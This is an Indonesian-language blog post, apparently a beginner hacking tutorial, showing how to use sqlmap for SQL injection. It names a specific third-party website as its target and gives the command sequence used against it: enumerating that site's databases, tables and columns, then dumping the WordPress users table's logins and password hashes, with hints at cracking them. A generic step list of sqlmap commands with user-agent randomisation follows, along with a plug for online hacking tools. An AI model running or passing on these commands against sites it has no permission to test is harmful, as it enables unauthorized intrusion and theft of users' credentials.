Kelebihan menggunakan SQL Map:
1. Bisa melakukan SQL Injection dengen beberapa method seperti:
- Boolean-Based Blind SQL Injection
- Time-Based Blind SQL Injection
- Error-Based SQL Injection
- UNION Query SQL Injection
- Stacked Query SQL Injection
2. Bisa berjalan baik untuk beberapa jenis database seperti:
- MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase &SAP MaxDB
- pilih salah satu situs target nya disini saya menggunakan situs di bawah ini
Found : http://golosdoma2.com/opinions.php?id='21 <-- SQLI Vuln Found..
klik ajah link tersebut , dan saya melihat
Warning:
mysql_fetch_assoc() expects parameter 1 to be resource, boolean given
in /home/users1/v/victarius/domains/golosdoma2.com/opinions.php on line
25
Bahwa situs tersebut memilki bug , dan insyaallah bisa di masuki sob (^_^)
- buka command prompt ketik " cd C:\Users\BL4CK_3YE116\Desktop\sqlmap " tanpa tanda petik , directory C:\Users\BL4CK_3YE116\Desktop\sqlmap merupakan directory folder tempat sqlmap berada
- setelah itu ketik sqlmap.py -u http://situstarget/opinions.php?(sqli) di sini saya menggunakan situs http://golosdoma2.com/opinions.php?id=22 , dan saya mengetik sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 untuk scan situs tersebut
- lalu ketik sqlmap.py -u http://situstarget/opinions.php?(sqli) --dbs disini saya menggunakan sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 --dbs , untuk melihat database situs tersebut
Saya menemukan information_schema dan victarius
- saya menggunakan database " victarius " lalu sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius --tables untuk melihat tables dari database tersebut
Saya menemukan table wp_users yang menurut saya menarih , :) hehehe
- setelah itu ketik sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius -T wp_users --column , untuk melhat column dari tables tersebut , lalu muncul
Saya pilih column ID,user_login,user_pass yang menurut saya menarik (^_^)
- dump column tersebut dengan cara sqlmap.py -u http://golosdoma2.com/opinions.php?id=22 -D victarius -T wp_users -C ID,user_login,user_pass --dump , lalu muncul dah
Password tersebut adalah MD5 wordpress , dan setahu saya ngak bisa di
crack ! :( tapi dalam sqlmap ada tools untuk menebak jenis password
tersebut dengan dictionary yang ada :) untuk melihat definisi dan jenis
hash bisa di lihat di sin
Tambahan :
Biar lengkap saya kasih step-stepnya:
- Test injeksi dengan men-fetch banner mysql (versi mysql)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --banner
- Fetch user yang digunakan, dan db yang sedang digunakan dengan flag (–current-user dan –current-db), langkah ini ialah analisis user yang dipakai di DBMS dan DB yang sedang digunakan pada website tersebut.
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --current-user --current-db
- Fetch list database yang bisa dihandle oleh user website-in@localhost dengan flag (–dbs)
Dengan mengetahui list databse yang lain kita dapat bebas melakukan
injeksi pada setiap database yang available untuk di injeksi.
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --dbs
- Fetch list tables di database portal dengan flag (-D nama_tabel –tables)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel --tables
- Fetch isi kolum pada setiap tables dengan flag (–columns)
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel -T nama_kolom --columns
- Sekarang kita akan men-fetch hanya isi dari kolum dengan flag (-D nama_tabel -T kolom -C isi_kolom1,isi_kolom2 –dump)
./sqlmap.py -u "http://situs_target.com"
--random-agent --threads 10 -D nama_tabel -T nama_kolom -C
isi_kolom1,isi_kolom2 --dump
agan juga bisa menggunakan tools online marinecyber untuk memudahkan agan ,, tools hack di sini , saya menyediakan adminfinder scanner dan sqli scanner
sampai di sin saja saya mohon maaf jika ada salah kata , berhubung saya hanyalah seorang newbie yang ingin mencoba (^_^)
0 komentar:
Posting Komentar